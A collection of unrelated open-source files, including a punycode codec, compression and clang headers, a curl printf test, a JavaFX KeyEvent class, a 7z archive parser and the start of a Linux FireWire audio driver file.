    Punycode parameters: initial bias = 72 (damp/skew are applied
    inside adapt()).
    """
    output = []
    bias = 72
    for points, delta in enumerate(deltas):
        output.extend(generate_generalized_integer(delta, bias))
        # The very first delta is damped more heavily (first=True).
        bias = adapt(delta, points == 0, baselen + points + 1)
    return "".join(output)
def punycode_encode(text):
    """Encode *text* as punycode: the ASCII part verbatim, then '-',
    then the encoded insertion deltas (the '-' is omitted when there
    is no ASCII part)."""
    base, extended = segregate(text)
    # Note: segregate() already returns the basic code points
    # ASCII-encoded; the original code re-encoded base here a second
    # time, which is a pointless no-op on Python 2 and an error on
    # bytes under Python 3.
    deltas = insertion_unsort(text, extended)
    extended = generate_integers(len(base), deltas)
    if base:
        return base + "-" + extended
    return extended
##################### Decoding #####################################
def decode_generalized_number(extended, extpos, bias, errors):
"""3.3 Generalized variable-length integers"""
result = 0
w = 1
j = 0
while 1:
try:
char = ord(extended[extpos])
except IndexError:
if errors == "strict":
raise UnicodeError, "incomplete punicode string"
return extpos + 1, None
extpos += 1
if 0x41 <= char <= 0x5A: # A-Z
digit = char - 0x41
elif 0x30 <= char <= 0x39:
digit = char - 22 # 0x30-26
elif errors == "strict":
raise UnicodeError("Invalid extended code point '%s'"
% extended[extpos])
else:
return extpos, None
t = T(j, bias)
result += digit * w
if digit < t:
return extpos, result
w = w * (36 - t)
j += 1
def insertion_sort(base, extended, errors):
    """Decode the generalized integers in *extended* and insert the
    corresponding characters into *base* (decoder counterpart of
    insertion unsort coding, RFC 3492 section 3.2).

    base is the already-decoded basic (ASCII) part; extended is the
    upper-cased delta section. Returns the fully decoded string.
    On a decoding error, 'strict' raises UnicodeError; otherwise a '?'
    replacement or a truncated result is produced.
    """
    char = 0x80
    pos = -1
    bias = 72
    extpos = 0
    while extpos < len(extended):
        newpos, delta = decode_generalized_number(extended, extpos,
                                                  bias, errors)
        if delta is None:
            # There was an error in decoding. We can't continue because
            # synchronization is lost.
            return base
        pos += delta+1
        # Each full pass over the insertion space advances to the next
        # code point.
        char += pos // (len(base) + 1)
        if char > 0x10FFFF:
            if errors == "strict":
                raise UnicodeError, ("Invalid character U+%x" % char)
            char = ord('?')
        pos = pos % (len(base) + 1)
        base = base[:pos] + unichr(char) + base[pos:]
        bias = adapt(delta, (extpos == 0), len(base))
        extpos = newpos
    return base
def punycode_decode(text, errors):
    """Decode a punycode string: the part before the last '-' is the
    literal ASCII portion, the part after it encodes the insertion
    deltas. *errors* is the usual codec error-handling mode."""
    pos = text.rfind("-")
    if pos == -1:
        # No hyphen: the whole string is deltas, no basic part.
        base = ""
        extended = text
    else:
        base = text[:pos]
        extended = text[pos+1:]
    base = unicode(base, "ascii", errors)
    # Digits are matched case-insensitively; normalize to upper case.
    extended = extended.upper()
    return insertion_sort(base, extended, errors)
### Codec APIs
class Codec(codecs.Codec):
    """Stateless encoder/decoder pair for the 'punycode' codec."""

    def encode(self,input,errors='strict'):
        # errors is accepted for API compatibility; punycode encoding
        # itself cannot fail, so it is not consulted here.
        res = punycode_encode(input)
        return res, len(input)

    def decode(self,input,errors='strict'):
        # Only the standard handlers are meaningful for punycode.
        if errors not in ('strict', 'replace', 'ignore'):
            raise UnicodeError, "Unsupported error handling "+errors
        res = punycode_decode(input, errors)
        return res, len(input)
class IncrementalEncoder(codecs.IncrementalEncoder):
    # Punycode needs the whole string at once, so each call encodes its
    # input independently; no state is carried between calls.
    def encode(self, input, final=False):
        return punycode_encode(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
    # Like the encoder: each call decodes independently, no state kept.
    def decode(self, input, final=False):
        if self.errors not in ('strict', 'replace', 'ignore'):
            raise UnicodeError, "Unsupported error handling "+self.errors
        return punycode_decode(input, self.errors)
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream wrappers reuse the stateless Codec implementation as-is.
    pass

class StreamReader(Codec,codecs.StreamReader):
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo entry the encodings package uses to
    register the 'punycode' codec."""
    return codecs.CodecInfo(
        name='punycode',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamwriter=StreamWriter,
        streamreader=StreamReader,
    )
|
{
"pile_set_name": "Github"
}
|
/*****************************************************************************/
/* pklib.h Copyright (c) Ladislav Zezula 2003 */
/*---------------------------------------------------------------------------*/
/* Header file for PKWARE Data Compression Library */
/*---------------------------------------------------------------------------*/
/* Date Ver Who Comment */
/* -------- ---- --- ------- */
/* 31.03.03 1.00 Lad The first version of pkware.h */
/*****************************************************************************/
#ifndef __PKLIB_H__
#define __PKLIB_H__
#include "../StormPort.h"
//-----------------------------------------------------------------------------
// Defines
#define CMP_BINARY 0 // Binary compression
#define CMP_ASCII 1 // Ascii compression
#define CMP_NO_ERROR 0
#define CMP_INVALID_DICTSIZE 1
#define CMP_INVALID_MODE 2
#define CMP_BAD_DATA 3
#define CMP_ABORT 4
#define CMP_IMPLODE_DICT_SIZE1 1024 // Dictionary size of 1024
#define CMP_IMPLODE_DICT_SIZE2 2048 // Dictionary size of 2048
#define CMP_IMPLODE_DICT_SIZE3 4096 // Dictionary size of 4096
//-----------------------------------------------------------------------------
// Define calling convention
#ifndef PKEXPORT
#ifdef WIN32
#define PKEXPORT __cdecl // Use for normal __cdecl calling
#else
#define PKEXPORT
#endif
#endif
//-----------------------------------------------------------------------------
// Internal structures
// Compression structure
// Compression (implode) working state. The hex comment on each member
// gives its byte offset inside the structure, mirroring the layout of
// the original PKWARE implementation.
typedef struct
{
    unsigned int   distance;                // 0000: Backward distance of the currently found repetition, decreased by 1
    unsigned int   out_bytes;               // 0004: # bytes available in out_buff
    unsigned int   out_bits;                // 0008: # of bits available in the last out byte
    unsigned int   dsize_bits;              // 000C: Number of bits needed for dictionary size. 4 = 0x400, 5 = 0x800, 6 = 0x1000
    unsigned int   dsize_mask;              // 0010: Bit mask for dictionary. 0x0F = 0x400, 0x1F = 0x800, 0x3F = 0x1000
    unsigned int   ctype;                   // 0014: Compression type (CMP_ASCII or CMP_BINARY)
    unsigned int   dsize_bytes;             // 0018: Dictionary size in bytes
    unsigned char  dist_bits[0x40];         // 001C: Distance bits
    unsigned char  dist_codes[0x40];        // 005C: Distance codes
    unsigned char  nChBits[0x306];          // 009C: Table of literal bit lengths to be put to the output stream
    unsigned short nChCodes[0x306];         // 03A2: Table of literal codes to be put to the output stream
    unsigned short offs09AE;                // 09AE: (purpose not documented in the original header)
    void         * param;                   // 09B0: User parameter
    unsigned int (*read_buf)(char *buf, unsigned int *size, void *param);  // 9B4: input callback
    void         (*write_buf)(char *buf, unsigned int *size, void *param); // 9B8: output callback
    unsigned short offs09BC[0x204];         // 09BC: (purpose not documented in the original header)
    unsigned long  offs0DC4;                // 0DC4: (purpose not documented in the original header)
    unsigned short phash_to_index[0x900];   // 0DC8: Array of indexes (one for each PAIR_HASH) to the "pair_hash_offsets" table
    unsigned short phash_to_index_end;      // 1FC8: End marker for "phash_to_index" table
    char           out_buff[0x802];         // 1FCA: Compressed data
    unsigned char  work_buff[0x2204];       // 27CC: Work buffer
                                            //  + DICT_OFFSET  => Dictionary
                                            //  + UNCMP_OFFSET => Uncompressed data
    unsigned short phash_offs[0x2204];      // 49D0: Table of offsets for each PAIR_HASH
} TCmpStruct;
#define CMP_BUFFER_SIZE sizeof(TCmpStruct) // Size of compression structure.
// Defined as 36312 in pkware header file
// Decompression structure
// Decompression (explode) working state; hex comments are member byte
// offsets, matching the original PKWARE layout.
typedef struct
{
    unsigned long offs0000;                 // 0000: (purpose not documented in the original header)
    unsigned long ctype;                    // 0004: Compression type (CMP_BINARY or CMP_ASCII)
    unsigned long outputPos;                // 0008: Position in output buffer
    unsigned long dsize_bits;               // 000C: Dict size (4, 5, 6 for 0x400, 0x800, 0x1000)
    unsigned long dsize_mask;               // 0010: Dict size bitmask (0x0F, 0x1F, 0x3F for 0x400, 0x800, 0x1000)
    unsigned long bit_buff;                 // 0014: 16-bit buffer for processing input data
    unsigned long extra_bits;               // 0018: Number of extra (above 8) bits in bit buffer
    unsigned int  in_pos;                   // 001C: Position in in_buff
    unsigned long in_bytes;                 // 0020: Number of bytes in input buffer
    void        * param;                    // 0024: Custom parameter
    unsigned int (*read_buf)(char *buf, unsigned int *size, void *param); // Pointer to function that reads data from the input stream
    void         (*write_buf)(char *buf, unsigned int *size, void *param);// Pointer to function that writes data to the output stream
    unsigned char out_buff[0x2204];         // 0030: Output circle buffer.
                                            //   0x0000 - 0x0FFF: Previous uncompressed data, kept for repetitions
                                            //   0x1000 - 0x1FFF: Currently decompressed data
                                            //   0x2000 - 0x2203: Reserve space for the longest possible repetition
    unsigned char in_buff[0x800];           // 2234: Buffer for data to be decompressed
    unsigned char DistPosCodes[0x100];      // 2A34: Table of distance position codes
    unsigned char LengthCodes[0x100];       // 2B34: Table of length codes
    unsigned char offs2C34[0x100];          // 2C34: Buffer for (purpose not documented in the original header)
    unsigned char offs2D34[0x100];          // 2D34: Buffer for (purpose not documented in the original header)
    unsigned char offs2E34[0x80];           // 2E34: Buffer for (offset corrected: original comment said 2EB4, but 2D34 + 0x100 = 2E34)
    unsigned char offs2EB4[0x100];          // 2EB4: Buffer for (purpose not documented in the original header)
    unsigned char ChBitsAsc[0x100];         // 2FB4: Buffer for (purpose not documented in the original header)
    unsigned char DistBits[0x40];           // 30B4: Numbers of bytes to skip copied block length
    unsigned char LenBits[0x10];            // 30F4: Numbers of bits for skip copied block length
    unsigned char ExLenBits[0x10];          // 3104: Number of valid bits for copied block
    unsigned short LenBase[0x10];           // 3114: Buffer for (purpose not documented in the original header)
} TDcmpStruct;
#define EXP_BUFFER_SIZE sizeof(TDcmpStruct) // Size of decompression structure
// Defined as 12596 in pkware headers
//-----------------------------------------------------------------------------
// Public functions
#ifdef __cplusplus
extern "C" {
#endif
// Compress (implode) a stream in the PKWARE DCL format. Data flows
// through the caller-supplied read_buf/write_buf callbacks; work_buf
// presumably must point to at least CMP_BUFFER_SIZE bytes (see the
// TCmpStruct definition above — TODO confirm against pklib docs).
// type selects CMP_BINARY/CMP_ASCII, dsize the dictionary size.
// Returns CMP_NO_ERROR or one of the CMP_* error codes.
unsigned int PKEXPORT implode(
   unsigned int (*read_buf)(char *buf, unsigned  int *size, void *param),
   void         (*write_buf)(char *buf, unsigned int *size, void *param),
   char         *work_buf,
   void         *param,
   unsigned int *type,
   unsigned int *dsize);

// Decompress (explode) a stream previously compressed with implode().
// work_buf presumably must point to at least EXP_BUFFER_SIZE bytes
// (see TDcmpStruct above — TODO confirm against pklib docs).
unsigned int PKEXPORT explode(
   unsigned int (*read_buf)(char *buf, unsigned  int *size, void *param),
   void         (*write_buf)(char *buf, unsigned int *size, void *param),
   char         *work_buf,
   void         *param);

// The original name "crc32" was changed to "crc32pk" due
// to compatibility with zlib
unsigned long PKEXPORT crc32_pklib(char *buffer, unsigned int *size, unsigned long *old_crc);
#ifdef __cplusplus
} // End of 'extern "C"' declaration
#endif
#endif // __PKLIB_H__
|
{
"pile_set_name": "Github"
}
|
//===- USRGeneration.h - Routines for USR generation ----------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_INDEX_USRGENERATION_H
#define LLVM_CLANG_INDEX_USRGENERATION_H
#include "clang/Basic/LLVM.h"
#include "llvm/ADT/StringRef.h"
namespace clang {
class Decl;
class MacroDefinitionRecord;
class SourceLocation;
class SourceManager;
namespace index {
/// \brief Returns the prefix ("c:") that all generated USRs begin with
/// (see generateUSRForDecl / generateUSRForMacro, which include it).
static inline StringRef getUSRSpacePrefix() {
  return "c:";
}
/// \brief Generate a USR for a Decl, including the USR prefix.
/// \returns true if the results should be ignored, false otherwise.
bool generateUSRForDecl(const Decl *D, SmallVectorImpl<char> &Buf);
/// \brief Generate a USR fragment for an Objective-C class.
void generateUSRForObjCClass(StringRef Cls, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "",
StringRef CategoryContextExtSymbolDefinedIn = "");
/// \brief Generate a USR fragment for an Objective-C class category.
void generateUSRForObjCCategory(StringRef Cls, StringRef Cat, raw_ostream &OS,
StringRef ClsExtSymbolDefinedIn = "",
StringRef CatExtSymbolDefinedIn = "");
/// \brief Generate a USR fragment for an Objective-C instance variable. The
/// complete USR can be created by concatenating the USR for the
/// encompassing class with this USR fragment.
void generateUSRForObjCIvar(StringRef Ivar, raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C method.
void generateUSRForObjCMethod(StringRef Sel, bool IsInstanceMethod,
raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C property.
void generateUSRForObjCProperty(StringRef Prop, bool isClassProp, raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C protocol.
void generateUSRForObjCProtocol(StringRef Prot, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "");
/// Generate USR fragment for a global (non-nested) enum.
void generateUSRForGlobalEnum(StringRef EnumName, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "");
/// Generate a USR fragment for an enum constant.
void generateUSRForEnumConstant(StringRef EnumConstantName, raw_ostream &OS);
/// \brief Generate a USR for a macro, including the USR prefix.
///
/// \returns true on error, false on success.
bool generateUSRForMacro(const MacroDefinitionRecord *MD,
const SourceManager &SM, SmallVectorImpl<char> &Buf);
bool generateUSRForMacro(StringRef MacroName, SourceLocation Loc,
const SourceManager &SM, SmallVectorImpl<char> &Buf);
} // namespace index
} // namespace clang
#endif // LLVM_CLANG_INDEX_USRGENERATION_H
|
{
"pile_set_name": "Github"
}
|
<testcase>
<info>
<keywords>
printf
unittest
</keywords>
</info>
#
# Server-side
<reply>
</reply>
# Client-side
<client>
<server>
none
</server>
# tool is what to use instead of 'curl'
<tool>
lib557
</tool>
<name>
curl_mprintf() testing
</name>
<command>
nothing
</command>
</client>
#
# Verify data after the test has been "shot"
<verify>
<stdout>
All curl_mprintf() unsigned short tests OK!
All curl_mprintf() signed short tests OK!
All curl_mprintf() unsigned int tests OK!
All curl_mprintf() signed int tests OK!
All curl_mprintf() unsigned long tests OK!
All curl_mprintf() signed long tests OK!
All curl_mprintf() curl_off_t tests OK!
All curl_mprintf() strings tests OK!
All float strings tests OK!
</stdout>
</verify>
</testcase>
|
{
"pile_set_name": "Github"
}
|
@using Sitecore
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Foundation.Theming.Extensions
@model Sitecore.Mvc.Presentation.RenderingModel
<div class="@Model.Rendering.GetContainerClass()">
<div class="row">
<div class="col-lg-8">
<article>
@Html.Sitecore().DynamicPlaceholder("col-wide-1", Model.Rendering.GetUseStaticPlaceholderNames())
</article>
<div>
@Html.Sitecore().DynamicPlaceholder("section-narrow", Model.Rendering.GetUseStaticPlaceholderNames())
</div>
</div>
<div class="col-lg-4">
<aside>
@Html.Sitecore().DynamicPlaceholder("col-narrow-1", Model.Rendering.GetUseStaticPlaceholderNames())
</aside>
</div>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright (c) 2010, 2017, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javafx.scene.input;
import com.sun.javafx.tk.Toolkit;
import javafx.beans.NamedArg;
import javafx.event.EventTarget;
import javafx.event.EventType;
import com.sun.javafx.scene.input.KeyCodeMap;
import javafx.event.Event;
import javafx.scene.input.ScrollEvent.HorizontalTextScrollUnits;
import javafx.scene.input.ScrollEvent.VerticalTextScrollUnits;
/**
* An event which indicates that a keystroke occurred in a {@link javafx.scene.Node}.
* <p>
* This event is generated when a key is pressed, released, or typed.
* Depending on the type of the event it is passed
* to {@link javafx.scene.Node#onKeyPressedProperty onKeyPressed}, {@link javafx.scene.Node#onKeyTypedProperty onKeyTyped}
* or {@link javafx.scene.Node#onKeyReleasedProperty onKeyReleased} function.
*
* <p>
* <em>"Key typed" events</em> are higher-level and generally do not depend on
* the platform or keyboard layout. They are generated when a Unicode character
* is entered, and are the preferred way to find out about character input.
* In the simplest case, a key typed event is produced by a single key press
* (e.g., 'a'). Often, however, characters are produced by series of key
* presses (e.g., SHIFT + 'a'), and the mapping from key pressed events to
* key typed events may be many-to-one or many-to-many. Key releases are not
* usually necessary to generate a key typed event, but there are some cases
* where the key typed event is not generated until a key is released (e.g.,
* entering ASCII sequences via the Alt-Numpad method in Windows).
* No key typed events are generated for keys that don't generate Unicode
* characters (e.g., action keys, modifier keys, etc.).
*
* <p>
* The {@code character} variable always contains a valid Unicode character(s)
* or CHAR_UNDEFINED. Character input is reported by key typed events;
* key pressed and key released events are not necessarily associated
* with character input. Therefore, the {@code character} variable
* is guaranteed to be meaningful only for key typed events.
*
* <p>
* For key pressed and key released events, the {@code code} variable contains
* the event's key code. For key typed events, the {@code code} variable
* always contains {@code KeyCode.UNDEFINED}.
*
* <p>
* <em>"Key pressed" and "key released" events</em> are lower-level and depend
* on the platform and keyboard layout. They are generated whenever a key is
* pressed or released, and are the only way to find out about keys that don't
* generate character input (e.g., action keys, modifier keys, etc.). The key
* being pressed or released is indicated by the code variable, which contains
* a virtual key code.
*
* <p>
* For triggering context menus see the {@link ContextMenuEvent}.
* @since JavaFX 2.0
*/
public final class KeyEvent extends InputEvent {

    private static final long serialVersionUID = 20121107L;

    /**
     * Common supertype for all key event types.
     */
    public static final EventType<KeyEvent> ANY =
            new EventType<KeyEvent>(InputEvent.ANY, "KEY");

    /**
     * This event occurs when a key has been pressed.
     */
    public static final EventType<KeyEvent> KEY_PRESSED =
            new EventType<KeyEvent>(KeyEvent.ANY, "KEY_PRESSED");

    /**
     * This event occurs when a key has been released.
     */
    public static final EventType<KeyEvent> KEY_RELEASED =
            new EventType<KeyEvent>(KeyEvent.ANY, "KEY_RELEASED");

    /**
     * This event occurs when a character-generating key was typed
     * (pressed and released). The event contains the {@code character}
     * field containing the typed string, the {@code code} and {@code text}
     * fields are not used.
     */
    public static final EventType<KeyEvent> KEY_TYPED =
            new EventType<KeyEvent>(KeyEvent.ANY, "KEY_TYPED");

    /**
     * Constructs a new {@code KeyEvent} event from the specified parameters.
     * @param source the source of the event. Can be null.
     * @param target the target of the event. Can be null.
     * @param eventType The type of the event.
     * @param character The character or sequence of characters associated with the event
     * @param text A String describing the key code
     * @param code The integer key code
     * @param shiftDown true if shift modifier was pressed.
     * @param controlDown true if control modifier was pressed.
     * @param altDown true if alt modifier was pressed.
     * @param metaDown true if meta modifier was pressed.
     * @since JavaFX 8.0
     */
    public KeyEvent(@NamedArg("source") Object source, @NamedArg("target") EventTarget target, @NamedArg("eventType") EventType<KeyEvent> eventType, @NamedArg("character") String character,
            @NamedArg("text") String text, @NamedArg("code") KeyCode code, @NamedArg("shiftDown") boolean shiftDown, @NamedArg("controlDown") boolean controlDown,
            @NamedArg("altDown") boolean altDown, @NamedArg("metaDown") boolean metaDown) {
        super(source, target, eventType);
        boolean isKeyTyped = eventType == KEY_TYPED;

        // Normalize the fields that are meaningless for this event type:
        // KEY_TYPED carries only `character`; KEY_PRESSED/KEY_RELEASED carry
        // only `text` and `code`. This guarantees the placeholder values
        // documented on the accessors below.
        this.character = isKeyTyped ? character : KeyEvent.CHAR_UNDEFINED;
        this.text = isKeyTyped ? "" : text;
        this.code = isKeyTyped ? KeyCode.UNDEFINED : code;
        this.shiftDown = shiftDown;
        this.controlDown = controlDown;
        this.altDown = altDown;
        this.metaDown = metaDown;
    }

    /**
     * Constructs a new {@code KeyEvent} event from the specified parameters,
     * with a {@code null} source and target.
     * @param eventType The type of the event.
     * @param character The character or sequence of characters associated with the event
     * @param text A String describing the key code
     * @param code The integer key code
     * @param shiftDown true if shift modifier was pressed.
     * @param controlDown true if control modifier was pressed.
     * @param altDown true if alt modifier was pressed.
     * @param metaDown true if meta modifier was pressed.
     * @since JavaFX 8.0
     */
    public KeyEvent(@NamedArg("eventType") EventType<KeyEvent> eventType, @NamedArg("character") String character,
            @NamedArg("text") String text, @NamedArg("code") KeyCode code, @NamedArg("shiftDown") boolean shiftDown, @NamedArg("controlDown") boolean controlDown,
            @NamedArg("altDown") boolean altDown, @NamedArg("metaDown") boolean metaDown) {
        // javafx.event.Event(EventType) is defined as this(null, null,
        // eventType), so delegating to the full constructor with null
        // source/target is behaviorally identical and removes the
        // previously duplicated field-normalization logic.
        this(null, null, eventType, character, text, code, shiftDown, controlDown,
                altDown, metaDown);
    }

    /**
     * KEY_PRESSED and KEY_RELEASED events which do not map to a valid Unicode
     * character use this for the keyChar value.
     */
    public static final String CHAR_UNDEFINED = KeyCode.UNDEFINED.ch;

    /**
     * The Unicode character or sequence of characters associated with the key
     * typed event. Contains multiple elements if the key produced a single
     * Unicode character from outside of the Basic Multilingual Plane which
     * needs to be encoded by the corresponding surrogate pair in Java or if
     * the key produced multiple Unicode characters itself.
     * <p>
     * For example, {@code character} will have the value "A" for a key typed
     * event generated by pressing SHIFT + 'a'.
     * For key pressed and key released events, {@code character} is always
     * {@code CHAR_UNDEFINED}.
     */
    private final String character;

    /**
     * The Unicode character or sequence of characters associated with the key
     * typed event. Contains multiple elements if the key produced a single
     * Unicode character from outside of the Basic Multilingual Plane which
     * needs to be encoded by the corresponding surrogate pair in Java or if
     * the key produced multiple Unicode characters itself.
     * <p>
     * For example, {@code character} will have the value "A" for a key typed
     * event generated by pressing SHIFT + 'a'.
     * For key pressed and key released events, {@code character} is always
     * {@code CHAR_UNDEFINED}.
     *
     * @return The Unicode character(s) associated with the key typed event
     */
    public final String getCharacter() {
        return character;
    }

    /**
     * A String describing the key code, such as "HOME", "F1" or "A",
     * for key pressed and key released events.
     * For key typed events, {@code text} is always the empty string.
     */
    private final String text;

    /**
     * A String describing the key code, such as "HOME", "F1" or "A",
     * for key pressed and key released events.
     * For key typed events, {@code text} is always the empty string.
     *
     * @return A String describing the key code
     */
    public final String getText() {
        return text;
    }

    /**
     * The integer key code associated with the key in this key
     * pressed or key released event.
     * For key typed events, {@code code} is always {@code KeyCode.UNDEFINED}.
     */
    private final KeyCode code;

    /**
     * The key code associated with the key in this key pressed or key released
     * event. For key typed events, {@code code} is always {@code KeyCode.UNDEFINED}.
     *
     * @return The key code associated with the key in this event,
     * {@code KeyCode.UNDEFINED} for key typed event
     */
    public final KeyCode getCode() {
        return code;
    }

    /**
     * Returns whether or not the Shift modifier is down on this event.
     */
    private final boolean shiftDown;

    /**
     * Returns whether or not the Shift modifier is down on this event.
     * @return whether or not the Shift modifier is down on this event.
     */
    public final boolean isShiftDown() {
        return shiftDown;
    }

    /**
     * Returns whether or not the Control modifier is down on this event.
     */
    private final boolean controlDown;

    /**
     * Returns whether or not the Control modifier is down on this event.
     * @return whether or not the Control modifier is down on this event.
     */
    public final boolean isControlDown() {
        return controlDown;
    }

    /**
     * Returns whether or not the Alt modifier is down on this event.
     */
    private final boolean altDown;

    /**
     * Returns whether or not the Alt modifier is down on this event.
     * @return whether or not the Alt modifier is down on this event.
     */
    public final boolean isAltDown() {
        return altDown;
    }

    /**
     * Returns whether or not the Meta modifier is down on this event.
     */
    private final boolean metaDown;

    /**
     * Returns whether or not the Meta modifier is down on this event.
     * @return whether or not the Meta modifier is down on this event.
     */
    public final boolean isMetaDown() {
        return metaDown;
    }

    /**
     * Returns whether or not the host platform common shortcut modifier is
     * down on this event. This common shortcut modifier is a modifier key which
     * is used commonly in shortcuts on the host platform. It is for example
     * {@code control} on Windows and {@code meta} (command key) on Mac.
     *
     * @return {@code true} if the shortcut modifier is down, {@code false}
     * otherwise
     */
    public final boolean isShortcutDown() {
        // Map the platform's preferred shortcut key onto the corresponding
        // modifier flag captured on this event.
        switch (Toolkit.getToolkit().getPlatformShortcutKey()) {
            case SHIFT:
                return shiftDown;
            case CONTROL:
                return controlDown;
            case ALT:
                return altDown;
            case META:
                return metaDown;
            default:
                return false;
        }
    }

    /**
     * Returns a string representation of this {@code KeyEvent} object.
     * @return a string representation of this {@code KeyEvent} object.
     */
    @Override public String toString() {
        final StringBuilder sb = new StringBuilder("KeyEvent [");
        sb.append("source = ").append(getSource());
        sb.append(", target = ").append(getTarget());
        sb.append(", eventType = ").append(getEventType());
        sb.append(", consumed = ").append(isConsumed());
        sb.append(", character = ").append(getCharacter());
        sb.append(", text = ").append(getText());
        sb.append(", code = ").append(getCode());
        if (isShiftDown()) {
            sb.append(", shiftDown");
        }
        if (isControlDown()) {
            sb.append(", controlDown");
        }
        if (isAltDown()) {
            sb.append(", altDown");
        }
        if (isMetaDown()) {
            sb.append(", metaDown");
        }
        if (isShortcutDown()) {
            sb.append(", shortcutDown");
        }
        return sb.append("]").toString();
    }

    @Override
    public KeyEvent copyFor(Object newSource, EventTarget newTarget) {
        return (KeyEvent) super.copyFor(newSource, newTarget);
    }

    /**
     * Creates a copy of the given event with the given fields substituted.
     * @param source the new source of the copied event
     * @param target the new target of the copied event
     * @param type the new event type.
     * @return the event copy with the fields substituted
     * @since JavaFX 8.0
     */
    public KeyEvent copyFor(Object source, EventTarget target, EventType<KeyEvent> type) {
        KeyEvent e = copyFor(source, target);
        e.eventType = type;
        return e;
    }

    @Override
    @SuppressWarnings("unchecked") // event type is always EventType<KeyEvent> by construction
    public EventType<KeyEvent> getEventType() {
        return (EventType<KeyEvent>) super.getEventType();
    }
}
|
{
"pile_set_name": "Github"
}
|
package com.nkanaev.comics.parsers;
import com.nkanaev.comics.managers.NaturalOrderComparator;
import com.nkanaev.comics.managers.Utils;
import org.apache.commons.compress.archivers.sevenz.SevenZArchiveEntry;
import org.apache.commons.compress.archivers.sevenz.SevenZFile;
import java.io.*;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
public class SevenZParser implements Parser {
    private List<SevenZEntry> mEntries;

    // Pairs an archive entry with its fully decompressed payload.
    // static: the holder needs no reference to the enclosing parser.
    private static class SevenZEntry {
        final SevenZArchiveEntry entry;
        final byte[] bytes;

        public SevenZEntry(SevenZArchiveEntry entry, byte[] bytes) {
            this.entry = entry;
            this.bytes = bytes;
        }
    }

    /**
     * Reads the given 7z archive, decompressing every image entry into
     * memory and sorting the pages by entry name in natural order.
     *
     * @param file the archive to parse
     * @throws IOException if the archive cannot be opened or read
     */
    @Override
    public void parse(File file) throws IOException {
        mEntries = new ArrayList<>();
        SevenZFile sevenZFile = new SevenZFile(file);
        try {
            // BUG FIX: the previous version used `continue` on directory
            // entries without advancing to the next entry, which spun
            // forever on any archive containing a directory. The for-loop's
            // update clause always fetches the next entry.
            for (SevenZArchiveEntry entry = sevenZFile.getNextEntry();
                    entry != null;
                    entry = sevenZFile.getNextEntry()) {
                if (entry.isDirectory()) {
                    continue;
                }
                if (Utils.isImage(entry.getName())) {
                    mEntries.add(new SevenZEntry(
                            entry, readFully(sevenZFile, (int) entry.getSize())));
                }
            }
        } finally {
            // All page data is copied into memory above, so the archive can
            // be closed as soon as parsing finishes (fixes a handle leak).
            sevenZFile.close();
        }
        Collections.sort(mEntries, new NaturalOrderComparator() {
            @Override
            public String stringValue(Object o) {
                return ((SevenZEntry) o).entry.getName();
            }
        });
    }

    // Reads exactly `size` bytes of the current entry. SevenZFile.read may
    // return short counts, so loop until the buffer is full or EOF.
    private static byte[] readFully(SevenZFile archive, int size) throws IOException {
        byte[] content = new byte[size];
        int offset = 0;
        while (offset < size) {
            int n = archive.read(content, offset, size - offset);
            if (n < 0) {
                break;
            }
            offset += n;
        }
        return content;
    }

    /** @return the number of image pages collected by {@link #parse}. */
    @Override
    public int numPages() {
        return mEntries.size();
    }

    /**
     * Returns a stream over the (already decompressed) page image.
     *
     * @param num zero-based page index
     */
    @Override
    public InputStream getPage(int num) throws IOException {
        return new ByteArrayInputStream(mEntries.get(num).bytes);
    }

    // NOTE(review): returns "tar" even though this parser handles 7z
    // archives — looks like a copy-paste from the tar parser. Left
    // unchanged because callers may match on this string; confirm whether
    // "7z" is the intended value.
    @Override
    public String getType() {
        return "tar";
    }

    /** Nothing to release: pages live on the heap and the archive is closed in parse(). */
    @Override
    public void destroy() throws IOException {
    }
}
|
{
"pile_set_name": "Github"
}
|
// SPDX-License-Identifier: GPL-2.0-only
/*
* ff-hwdep.c - a part of driver for RME Fireface series
*
* Copyright (c) 2015-2017 Takashi Sakamoto
*/
/*
 * This code provides three functionalities:
 *
 * 1. getting FireWire node information
 * 2. getting notifications about starting/stopping streams
 * 3. locking/unlocking streams
 */
#include "ff.h"
/*
 * Blocking read for lock-status notifications: sleeps until another path
 * flips ff->dev_lock_changed, then reports the current lock state to user
 * space as a SNDRV_FIREWIRE_EVENT_LOCK_STATUS event and clears the flag.
 * Returns the number of bytes copied, -ERESTARTSYS when interrupted by a
 * signal, or -EFAULT when the copy to user space fails.
 */
static long hwdep_read(struct snd_hwdep *hwdep, char __user *buf, long count,
		       loff_t *offset)
{
	struct snd_ff *ff = hwdep->private_data;
	DEFINE_WAIT(wait);
	union snd_firewire_event event;

